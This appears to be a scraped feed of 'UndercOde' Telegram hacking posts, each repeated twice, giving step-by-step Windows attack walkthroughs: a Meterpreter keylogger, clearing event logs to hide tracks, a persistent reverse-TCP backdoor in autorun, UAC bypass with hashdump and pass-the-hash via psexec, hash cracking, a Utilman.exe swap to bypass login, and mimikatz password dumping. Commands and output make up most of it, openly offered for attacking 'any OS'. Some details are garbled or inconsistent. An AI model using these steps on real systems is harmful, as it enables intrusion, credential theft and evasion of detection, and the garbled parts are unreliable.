β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Dump Hack data- Collecting Target System Data
The attack payload was passed to the target system and the session was successfully established. well lets start !
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
When a session is successfully established, an attacker can collect its data from the target system. Collect the data of the target system to enable users to use this information as far as possible for further penetration attacks. Collecting data for the target system is described below. The specific steps to collect data for the target system are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) Turn on the keylogger. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
3) Collect data from the target system. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34
From the output information, you can see that the target system has executed the Enter key, entered numbers 1, 2, and 34.
7.3.4 Clear trail
4) When an attacker invades the target system, any operation performed by the attacker may be recorded in the target system's log file. In order not to be found by the target system, it is very important to clear the trail. Because if it is found, it can cause a lot of trouble. Now users don't need to worry about this problem, because Metasploit provides a way to easily remove all traces. Here's how to use Metasploit to clear your tracks.
π¦ The specific steps to clear the trail using Metasploit are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) The irb command in Metasploit can clear the trace. The execution command is as follows:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
When you see the >> prompt in the output, it means that the irb command was successfully run.
3) Set the log you want to delete. The common log options are as follows:
log = client.sys.eventlog.open ('system');
log = client.sys.eventlog.open ('security');
log = client.sys.eventlog.open ('application');
log = client.sys.eventlog.open ('directory service');
log = client.sys.eventlog.open ('dns server');
log = client.sys.eventlog.open ('file replication service').
Clear all logs here. The execution command is as follows:
>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')
4) After executing the above command, it means that the log to be cleared is specified. Next, you need to execute the log.clear command to clear the log file. The execution command is as follows:
>> log.clear
5) After executing the above command, the user's trail will be hidden.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How Dump Hack data- Collecting Target System Data
The attack payload was passed to the target system and the session was successfully established. well lets start !
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
When a session is successfully established, an attacker can collect its data from the target system. Collect the data of the target system to enable users to use this information as far as possible for further penetration attacks. Collecting data for the target system is described below. The specific steps to collect data for the target system are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) Turn on the keylogger. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
3) Collect data from the target system. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34
From the output information, you can see that the target system has executed the Enter key, entered numbers 1, 2, and 34.
7.3.4 Clear trail
4) When an attacker invades the target system, any operation performed by the attacker may be recorded in the target system's log file. In order not to be found by the target system, it is very important to clear the trail. Because if it is found, it can cause a lot of trouble. Now users don't need to worry about this problem, because Metasploit provides a way to easily remove all traces. Here's how to use Metasploit to clear your tracks.
π¦ The specific steps to clear the trail using Metasploit are shown below.
1) Activate Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
2) The irb command in Metasploit can clear the trace. The execution command is as follows:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
When you see the >> prompt in the output, it means that the irb command was successfully run.
3) Set the log you want to delete. The common log options are as follows:
log = client.sys.eventlog.open ('system');
log = client.sys.eventlog.open ('security');
log = client.sys.eventlog.open ('application');
log = client.sys.eventlog.open ('directory service');
log = client.sys.eventlog.open ('dns server');
log = client.sys.eventlog.open ('file replication service').
Clear all logs here. The execution command is as follows:
>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')
4) After executing the above command, it means that the log to be cleared is specified. Next, you need to execute the log.clear command to clear the log file. The execution command is as follows:
>> log.clear
5) After executing the above command, the user's trail will be hidden.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create a Persistent Backdoor by Underc0de v
1) After successfully gaining access to the target system, you need to find a way to restore the connection to the target host without having to enter the target system again.
2) If the target user breaks the connection, such as restarting the computer, using a backdoor at this time will allow the connection to the target system to be automatically re-established. To facilitate subsequent infiltrations, a backdoor needs to be created. This way, even if the connection is interrupted, it will not affect the work.
π¦ Here's how to create a persistent backdoor. The specific steps to create a durable backdoor are shown below.
1) iniciado Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
2) Before creating a persistent backdoor, check its help file
above information shows some options for durable backdoors. Use different options to set up the backdoor.
3) Create a durable backdoor. The execution command is as follows:
meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/
AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
5) The output shows a process for creating a backdoor. In the above information, you can see that a persistent script was created in the target system and saved in C: \ DOCUME ~ 1 \ Test \ LOCALS ~ 1 \ Temp \ IzXBdJvcpnD.vbs. And, the script will automatically run on the target host, at which point a second Meterpreter session will be established. As follows:
> meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032)
>Well done!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create a Persistent Backdoor by Underc0de v
1) After successfully gaining access to the target system, you need to find a way to restore the connection to the target host without having to enter the target system again.
2) If the target user breaks the connection, such as restarting the computer, using a backdoor at this time will allow the connection to the target system to be automatically re-established. To facilitate subsequent infiltrations, a backdoor needs to be created. This way, even if the connection is interrupted, it will not affect the work.
π¦ Here's how to create a persistent backdoor. The specific steps to create a durable backdoor are shown below.
1) iniciado Meterpreter session. The execution command is as follows:
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
2) Before creating a persistent backdoor, check its help file
above information shows some options for durable backdoors. Use different options to set up the backdoor.
3) Create a durable backdoor. The execution command is as follows:
meterpreter > run persistence -U -A -i 10 - 8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/
AA-886OKJM26FSW_20140507.2857/AA-886OKJM26FSW_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\Test\LOCALS~1\Temp\IzXBdJvcpnD.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\
CurrentVersion\Run\mERugsIe
5) The output shows a process for creating a backdoor. In the above information, you can see that a persistent script was created in the target system and saved in C: \ DOCUME ~ 1 \ Test \ LOCALS ~ 1 \ Temp \ IzXBdJvcpnD.vbs. And, the script will automatically run on the target host, at which point a second Meterpreter session will be established. As follows:
> meterpreter > [*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032)
>Well done!
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦After Those Tutorials you are able to dump, and backdoor any OS, Only For Underc0de, enjoy
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking the LM Hashes password on any kali-parrot os
LM (LAN Manager) Hash is one of the earliest password hashing algorithms used in the Windows operating system.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> This was the only version available until the more advanced NTLMv2 was used in Windows 2000, XP, Vista, and Windows 7.
> Although these new operating systems can support the use of LM hashing, they are mainly intended to provide backward compatibility. However, in Windows Vista and Windows 7, the algorithm is disabled by default.
> This section will introduce how to crack LM Hashes password.
In Kali Linux, you can use the findmyhash tool to crack the LM Hashes password. The syntax of the findmyhash command is as follows:
findmyhash <Encryption> -h hash
> The meaning of each option in the above syntax is shown below.
Encryption: Specify the type of hash encryption used.
-h: specifies the LM hash value to be cracked.
[Example 8-2] Use the findmyhash command to attack the LM Hashes
password. The execution command is as follows:
>root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
> Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99
> Analyzing with md5hood (http://md5hood.com)β¦
β¦ hash not found in md5hood
>Analyzing with stringfunction (http://www.stringfunction.com)β¦
β¦ hash not found in stringfunction
> Analyzing with 99k.org (http://xanadrel.99k.org)β¦
β¦ hash not found in 99k.org
>Analyzing with sans (http://isc.sans.edu)β¦
β¦ hash not found in sans
> Analyzing with bokehman (http://bokehman.com)β¦
β¦ hash not found in bokehman
> Analyzing with goog.li (http://goog.li)β¦
β¦ hash not found in goog.li
> Analyzing with schwett (http://schwett.com)β¦
β¦ hash not found in schwett
> Analyzing with netmd5crack (http://www.netmd5crack.com)β¦
β¦ hash not found in netmd5crack
> Analyzing with md5-cracker (http://www.md5-cracker.tk)β¦
β¦ hash not found in md5-cracker
> Analyzing with benramsey (http://tools.benramsey.com)β¦
β¦ hash not found in benramsey
> Analyzing with gromweb (http://md5.gromweb.com)β¦
***** HASH CRACKED!! *****
The original string is: password
The following hashes were cracked:
----------------------------------
5f4dcc3b5aa765d61d8327deb882cf99 -> password
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking the LM Hashes password on any kali-parrot os
LM (LAN Manager) Hash is one of the earliest password hashing algorithms used in the Windows operating system.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> This was the only version available until the more advanced NTLMv2 was used in Windows 2000, XP, Vista, and Windows 7.
> Although these new operating systems can support the use of LM hashing, they are mainly intended to provide backward compatibility. However, in Windows Vista and Windows 7, the algorithm is disabled by default.
> This section will introduce how to crack LM Hashes password.
In Kali Linux, you can use the findmyhash tool to crack the LM Hashes password. The syntax of the findmyhash command is as follows:
findmyhash <Encryption> -h hash
> The meaning of each option in the above syntax is shown below.
Encryption: Specify the type of hash encryption used.
-h: specifies the LM hash value to be cracked.
[Example 8-2] Use the findmyhash command to attack the LM Hashes
password. The execution command is as follows:
>root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99
> Cracking hash: 5f4dcc3b5aa765d61d8327deb882cf99
> Analyzing with md5hood (http://md5hood.com)β¦
β¦ hash not found in md5hood
>Analyzing with stringfunction (http://www.stringfunction.com)β¦
β¦ hash not found in stringfunction
> Analyzing with 99k.org (http://xanadrel.99k.org)β¦
β¦ hash not found in 99k.org
>Analyzing with sans (http://isc.sans.edu)β¦
β¦ hash not found in sans
> Analyzing with bokehman (http://bokehman.com)β¦
β¦ hash not found in bokehman
> Analyzing with goog.li (http://goog.li)β¦
β¦ hash not found in goog.li
> Analyzing with schwett (http://schwett.com)β¦
β¦ hash not found in schwett
> Analyzing with netmd5crack (http://www.netmd5crack.com)β¦
β¦ hash not found in netmd5crack
> Analyzing with md5-cracker (http://www.md5-cracker.tk)β¦
β¦ hash not found in md5-cracker
> Analyzing with benramsey (http://tools.benramsey.com)β¦
β¦ hash not found in benramsey
> Analyzing with gromweb (http://md5.gromweb.com)β¦
***** HASH CRACKED!! *****
The original string is: password
The following hashes were cracked:
----------------------------------
5f4dcc3b5aa765d61d8327deb882cf99 -> password
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦if You think that cracking LM Hashes is too slow, you can use the psexec module in Metasploit to bypass the hash value. The method of bypassing the hash value using the psexec module will be described below:
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) By running the executable file backup.exe created by Veil on the target host (Windows 7), successfully obtain an active remote session, as shown below:
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handlerβ¦
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800
From the above information, you can see that Session 1 was successfully opened.
2) View user rights information. The execution command is as follows:
meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw
From the output information, you can see that the user's permission is a normal permission. Next, bypass the UAC using the bypassuac module.
3) Set lyw users to bypass UAC. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 1β¦
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking levelβ¦
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuingβ¦
[+] Part of Administrators group! Continuingβ¦
[*] Uploaded the agent to the filesystemβ¦.
[*] Uploading the bypass UAC executable to the filesystemβ¦
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
meterpreter > getsystem
β¦got system (via technique 1).
meterpreter > getuid
> Server username: NT AUTHORITY\SYSTEM
From the output information, you can see that the lyw user authority is SYSTEM at this time.
4) View the hash password values of all users on the target host. The execution command is as follows:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot keyβ¦
[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19daeβ¦
[*] Obtaining the user list and keysβ¦
[*] Decrypting user keysβ¦
[*] Dumping password hintsβ¦
Test:"123"
[*] Dumping password hashesβ¦
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
From the output, you can see that the hashed password values of six users were captured. At this point, you can use the SMB psexec module to bypass the hash value.
5) Run session 2 in the background. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 2β¦
6) Use the SMB psexec module and set the required configuration option parameters. The execution command is as follows:
msf exploit(bypassuac) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.6.114
RHOST => 192.168.6.114
msf exploit(psexec) > set SMBUser Test
SMBUser => alice
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:
22315d6ed1a7d5f8a7c98c40e9fa2dec
SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
π¦if You think that cracking LM Hashes is too slow, you can use the psexec module in Metasploit to bypass the hash value. The method of bypassing the hash value using the psexec module will be described below:
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) By running the executable file backup.exe created by Veil on the target host (Windows 7), successfully obtain an active remote session, as shown below:
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handlerβ¦
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800
From the above information, you can see that Session 1 was successfully opened.
2) View user rights information. The execution command is as follows:
meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw
From the output information, you can see that the user's permission is a normal permission. Next, bypass the UAC using the bypassuac module.
3) Set lyw users to bypass UAC. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 1β¦
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking levelβ¦
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuingβ¦
[+] Part of Administrators group! Continuingβ¦
[*] Uploaded the agent to the filesystemβ¦.
[*] Uploading the bypass UAC executable to the filesystemβ¦
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
meterpreter > getsystem
β¦got system (via technique 1).
meterpreter > getuid
> Server username: NT AUTHORITY\SYSTEM
From the output information, you can see that the lyw user authority is SYSTEM at this time.
4) View the hash password values of all users on the target host. The execution command is as follows:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot keyβ¦
[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19daeβ¦
[*] Obtaining the user list and keysβ¦
[*] Decrypting user keysβ¦
[*] Dumping password hintsβ¦
Test:"123"
[*] Dumping password hashesβ¦
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
From the output, you can see that the hashed password values of six users were captured. At this point, you can use the SMB psexec module to bypass the hash value.
5) Run session 2 in the background. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 2β¦
6) Use the SMB psexec module and set the required configuration option parameters. The execution command is as follows:
msf exploit(bypassuac) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.6.114
RHOST => 192.168.6.114
msf exploit(psexec) > set SMBUser Test
SMBUser => alice
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:
22315d6ed1a7d5f8a7c98c40e9fa2dec
SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
Forwarded from U
7) Start the attack. The execution command is as follows:
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Connecting to the serverβ¦
[*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'β¦
[*] Uploading payloadβ¦
[*] Created \XBotpcOY.exeβ¦
[*] Deleting \XBotpcOY.exeβ¦
[*] Sending stage (769536 bytes) to 192.168.6.114
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800
From the output information, you can see that the user using "Test" successfully opened a session
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Connecting to the serverβ¦
[*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'β¦
[*] Uploading payloadβ¦
[*] Created \XBotpcOY.exeβ¦
[*] Deleting \XBotpcOY.exeβ¦
[*] Sending stage (769536 bytes) to 192.168.6.114
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800
From the output information, you can see that the user using "Test" successfully opened a session
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Bypassing Utilman Login for Windows by Underc0de :
> Utilman is a Windows accessibility manager.
> This program is the most important file stored in the Windows system files. Usually
> it is automatically created during the system installation process, which is very important for the normal operation of the system. Under Windows, you can use the Windows + U key combination to call the Utilman process. This section describes how to bypass the Utilman program and log in to the system to run other operations.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In the Windows interface, start Kali Linux LiveCD
2) Select Live (686-pae) on this interface, and press Enter to start Kali Linux
3) the interface displays files and folders in the Windows operating system. Here open the Windows | System32 folder in turn
4) Find the Utilman.exe file in the folder and rename the file to Utilman.old. Then copy the cmd.exe file and change its file name to Utilman.exe.
5) Now close Kali Linux and start Windows. Press the Windows + u key combination on the login interface
6 ) From this interface, you can see that a command prompt window opens. In this window, you can execute some DOS commands. For example, using the whoami command to view user information will display the cmd interface
7) As can be seen from the output interface, the current user has the highest authority. At this point, you can perform any operation.
After learning to bypass Utilman login, you can use the mimikatz tool to restore the user's password when the target system is locked.
> The following will introduce the use of mimikatz tools to recover passwords from locked state.
8) You need to do some preparation before operation. First download the mimikatz tool from http://blog.gentilkiwi.com/mimikatz(Official ) . Its package name is mimikatz_trunk.zip. Extract the package and save it to a USB disk. In this example, save the decompressed file to the mimikatz directory of the USB flash drive.
π¦ well now see next Step> Cracking the Windows
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Bypassing Utilman Login for Windows by Underc0de :
> Utilman is a Windows accessibility manager.
> This program is the most important file stored in the Windows system files. Usually
> it is automatically created during the system installation process, which is very important for the normal operation of the system. Under Windows, you can use the Windows + U key combination to call the Utilman process. This section describes how to bypass the Utilman program and log in to the system to run other operations.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) In the Windows interface, start Kali Linux LiveCD
2) Select Live (686-pae) on this interface, and press Enter to start Kali Linux
3) the interface displays files and folders in the Windows operating system. Here open the Windows | System32 folder in turn
4) Find the Utilman.exe file in the folder and rename the file to Utilman.old. Then copy the cmd.exe file and change its file name to Utilman.exe.
5) Now close Kali Linux and start Windows. Press the Windows + u key combination on the login interface
6 ) From this interface, you can see that a command prompt window opens. In this window, you can execute some DOS commands. For example, using the whoami command to view user information will display the cmd interface
7) As can be seen from the output interface, the current user has the highest authority. At this point, you can perform any operation.
After learning to bypass Utilman login, you can use the mimikatz tool to restore the user's password when the target system is locked.
> The following will introduce the use of mimikatz tools to recover passwords from locked state.
8) You need to do some preparation before operation. First download the mimikatz tool from http://blog.gentilkiwi.com/mimikatz(Official ) . Its package name is mimikatz_trunk.zip. Extract the package and save it to a USB disk. In this example, save the decompressed file to the mimikatz directory of the USB flash drive.
π¦ well now see next Step> Cracking the Windows
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from U
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now Let s Crack The Windows Login
> Install Utilman Bypass in the system to be able to execute some commands.
t.me/UndercOdeTesting
1) Press the Windows + u key combination on the locked Windows desktop
2) by default, when the Windows + u key combination is used to start a DOS window, the height of the window buffer is 30. When outputting more data, you will not see everything. Therefore, you need to increase the height of the window in the properties menu of the DOS window
3) select the "Layout" tab on this interface and modify the height value below the screen buffer size. Then click the "OK" button to scroll the mouse to see everything.
4) At this point, execute some commands on the command line to recover the Windows user password. First confirm the permissions of the current user, execute the command as follows:
C:\Windows\system32> UndercOde
nt authority\system
5) Enter the USB disk and check the contents of the disk. The USB disk number F: in this example, the execution command is as follows:
C:\Windows\system32> F:
F:\>dir mimikatz
2019/05/26 03:45 4,311 README.md
2019/06/15 04:54 Win32
2019/06/15 04:54 x64
6) From the output, you can see that there are three files in the mimikatz directory. Win32 and x64 represent the two versions of mimikatz. Choose the corresponding version according to your system architecture. The operating system in this example is 32-bit, so Win32 is chosen.
7) View the contents of the Win32 directory:
F:\>cd mimikatz
F:\Mimikatz>cd win32
F:\Mimikatz\Win32>dir
2019/06/15 04:54 29,056 mimidrv.sys
2019/06/15 04:54 189,936 mimikatz.exe
2019/06/15 04:54 27,632 mimilib.dll
8) From the output, you can see that there are three files in the Win32 directory. Among them, mimikatz is an executable file.
π¦ Run the mimikatz program :
The mimikatz # prompt indicates that you have successfully logged in to the mimikatz program.
1) Recover password. The execution command is as follows:
mimikatz # sekurlsa::logonPasswords
or:
2) mimikatz # sekurlsa::logonPasswords full
π¦ The following information is output:
Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session : Interactive from 1
User Name : UndercOde
Domain : Windows7Test
SID : S-1-5-21-2306344666-604645106-2825843324-1001
msv :
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
[00000003] Primary
* Username : UndercOde
* Domain : Windows7Test
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
π¦ wdigest :
* Username : UndercOde
* Domain : Windows7Test
* Password : 123456
> kerberos :
* Username : UndercOde
* Domain : Windows7Test
* Password : (null)
> ssp :
credman :
π¦ From the above output information, you can see all the information of the locked user. Such as user name, various encrypted HASH values, domain name and password.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now Let s Crack The Windows Login
> Install Utilman Bypass in the system to be able to execute some commands.
t.me/UndercOdeTesting
1) Press the Windows + u key combination on the locked Windows desktop
2) by default, when the Windows + u key combination is used to start a DOS window, the height of the window buffer is 30. When outputting more data, you will not see everything. Therefore, you need to increase the height of the window in the properties menu of the DOS window
3) select the "Layout" tab on this interface and modify the height value below the screen buffer size. Then click the "OK" button to scroll the mouse to see everything.
4) At this point, execute some commands on the command line to recover the Windows user password. First confirm the permissions of the current user, execute the command as follows:
C:\Windows\system32> UndercOde
nt authority\system
5) Enter the USB disk and check the contents of the disk. The USB disk number F: in this example, the execution command is as follows:
C:\Windows\system32> F:
F:\>dir mimikatz
2019/05/26 03:45 4,311 README.md
2019/06/15 04:54 Win32
2019/06/15 04:54 x64
6) From the output, you can see that there are three files in the mimikatz directory. Win32 and x64 represent the two versions of mimikatz. Choose the corresponding version according to your system architecture. The operating system in this example is 32-bit, so Win32 is chosen.
7) View the contents of the Win32 directory:
F:\>cd mimikatz
F:\Mimikatz>cd win32
F:\Mimikatz\Win32>dir
2019/06/15 04:54 29,056 mimidrv.sys
2019/06/15 04:54 189,936 mimikatz.exe
2019/06/15 04:54 27,632 mimilib.dll
8) From the output, you can see that there are three files in the Win32 directory. Among them, mimikatz is an executable file.
π¦ Run the mimikatz program :
The mimikatz # prompt indicates that you have successfully logged in to the mimikatz program.
1) Recover password. The execution command is as follows:
mimikatz # sekurlsa::logonPasswords
or:
2) mimikatz # sekurlsa::logonPasswords full
π¦ The following information is output:
Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session : Interactive from 1
User Name : UndercOde
Domain : Windows7Test
SID : S-1-5-21-2306344666-604645106-2825843324-1001
msv :
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
[00000003] Primary
* Username : UndercOde
* Domain : Windows7Test
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
π¦ wdigest :
* Username : UndercOde
* Domain : Windows7Test
* Password : 123456
> kerberos :
* Username : UndercOde
* Domain : Windows7Test
* Password : (null)
> ssp :
credman :
π¦ From the above output information, you can see all the information of the locked user. Such as user name, various encrypted HASH values, domain name and password.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β